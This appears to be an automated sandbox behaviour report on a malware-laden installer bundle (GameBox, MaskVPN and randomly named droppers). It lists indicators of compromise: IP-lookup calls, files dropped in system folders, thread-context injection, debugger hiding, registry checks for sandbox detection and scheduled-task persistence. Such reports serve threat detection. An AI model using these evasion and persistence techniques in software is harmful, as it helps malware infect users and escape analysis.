GameBoxWin64.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: Setup.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: GameBoxWin64.exe File opened (read-only) \??\Q: GameBoxWin64.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: GameBoxWin64.exe File opened (read-only) \??\J: Cleaner Installation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 139 ipinfo.io 157 ip-api.com 246 ipinfo.io 374 ipinfo.io 378 ipinfo.io 29 ipinfo.io 30 ipinfo.io 137 ipinfo.io 194 ipinfo.io 202 ipinfo.io 207 ipinfo.io 213 ipinfo.io -
Drops file in System32 directory 26 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET185A.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET1848.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET1859.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET185A.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF mask_svc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 07D28FF30FFB6C9D svchost.exe File created C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET1859.tmp DrvInst.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe svchost32.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.log svchost32.exe File created C:\Windows\system32\services32.exe cmd.exe File opened for modification C:\Windows\system32\services32.exe cmd.exe File opened for modification C:\Windows\System32\Tasks\services32 svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705} DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET1848.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\tap0901.sys DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 2136 0NKIqxJZOxkSqcoqQk5gff41.exe 3336 WgAQMBbuvnZa4Uim1cKe4vXj.exe 3492 9V6mnXHdynq1s7PpT244URZa.exe 492 8md1vxAwe7Y0ndRiBYaafLjk.exe 7064 R4FS14llhaVLNhuh_1UBG_AQ.exe 6468 6UIpSNXQ6X1bGK6xwzbZrjMo.exe 7252 vwqOzdi1PVwJK8OTScrNyxPr.exe 7236 Od44Rf8EHJH4T2sW1PLJmC6c.exe 8868 CE4F.exe 3416 mask_svc.exe 2184 mask_svc.exe 5152 mask_svc.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 2264 set thread context of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2152 set thread context of 4396 2152 gdCjIZ3vQLrTFWKdOezjL1wn.exe 103 PID 2852 set thread context of 4564 2852 IvXEuwW59N_cXWlDbgjIyNx7.exe 108 PID 3936 set thread context of 5340 3936 svchost.exe 151 PID 4872 set thread context of 7084 4872 6LGTDlklqHr_ugBFTS3a5F3S.exe 206 PID 5368 set thread context of 7724 5368 vrLdEfNDqg6wjThV5I51bglQ.exe 229 PID 5604 set thread context of 7792 5604 zr97cx4azYVfX6pY_pzTXCPo.exe 230 PID 7244 set thread context of 5820 7244 VHeR3A327UOUv2ALnQd1Z4r1.exe 233 PID 8144 set thread context of 1784 8144 launcher.exe 436 PID 7020 set thread context of 2608 7020 launcher.exe 445 PID 7764 set thread context of 7828 7764 Esplorarne.exe.com 473 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Mozilla Maintenance Service\Molaraxepae.exe.config Conhost.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\tmp.edb md7_7dfj.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-SSFR5.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-MNDE8.tmp Setup.tmp File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\MaskVPN\is-GCNU2.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-2MCRV.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KRMAV.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe yY2qmC4iOLBQc_v9oIAFRu3F.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-G3I0A.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QTC8O.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-R43IO.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-D2K3V.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-4T7EM.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-VO1MB.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\is-U3FL4.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-BR455.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libass.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-1SKCL.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-BLR77.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-9QCJU.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe yY2qmC4iOLBQc_v9oIAFRu3F.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\unins000.dat Setup.tmp File created C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe Conhost.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-5GC8A.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-8GH2V.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-1MFSE.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-ANHMO.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\is-ISMC6.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-A55LO.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-B868P.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-F5OD7.tmp Setup.tmp File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini yY2qmC4iOLBQc_v9oIAFRu3F.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\d.jfm md7_7dfj.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-0ODIC.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-LD6LP.tmp Setup.tmp -
Drops file in Windows directory 30 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIEF68.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI232B.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log mask_svc.exe File opened for modification C:\Windows\Installer\MSI2465.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI293B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEDD1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE89F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE9C9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI26A9.tmp msiexec.exe File created C:\Windows\Installer\f78c611.msi msiexec.exe File opened for modification C:\Windows\Installer\f78c611.msi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\INF\oem2.PNF mask_svc.exe File opened for modification C:\Windows\Installer\MSI4367.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Installer\MSICCF7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE811.tmp msiexec.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI24D3.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 29 IoCs
pid pid_target Process procid_target 4812 4612 WerFault.exe 109 4728 4612 WerFault.exe 109 4544 4612 WerFault.exe 109 2032 4612 WerFault.exe 109 4212 4612 WerFault.exe 109 992 4612 WerFault.exe 109 4736 4612 WerFault.exe 109 5000 508 WerFault.exe 102 3260 508 WerFault.exe 102 4080 508 WerFault.exe 102 2032 508 WerFault.exe 102 5176 508 WerFault.exe 102 5484 508 WerFault.exe 102 5756 508 WerFault.exe 102 5940 508 WerFault.exe 102 5208 508 WerFault.exe 102 6116 508 WerFault.exe 102 6136 508 WerFault.exe 102 1220 4512 WerFault.exe 129 6064 508 WerFault.exe 102 7264 6248 WerFault.exe 217 7660 6248 WerFault.exe 217 7960 6248 WerFault.exe 217 8088 6248 WerFault.exe 217 6060 5884 WerFault.exe 154 5964 5884 WerFault.exe 154 7144 5884 WerFault.exe 154 7436 6248 WerFault.exe 217 5864 6248 WerFault.exe 217 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters mask_svc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cfsafjc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters mask_svc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ Process not Found Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cfsafjc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 Process not Found Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0UDlIYAqdx58fbBuKxF2FjgJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 Process not Found Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cfsafjc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 Process not Found Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cfsafjc Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 Process not Found Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cfsafjc Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI H_GAN4lymZYNIe2SYb1o6PjL.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 mask_svc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cfsafjc Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters mask_svc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 Process not Found Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI H_GAN4lymZYNIe2SYb1o6PjL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6944 schtasks.exe 7744 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 6916 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
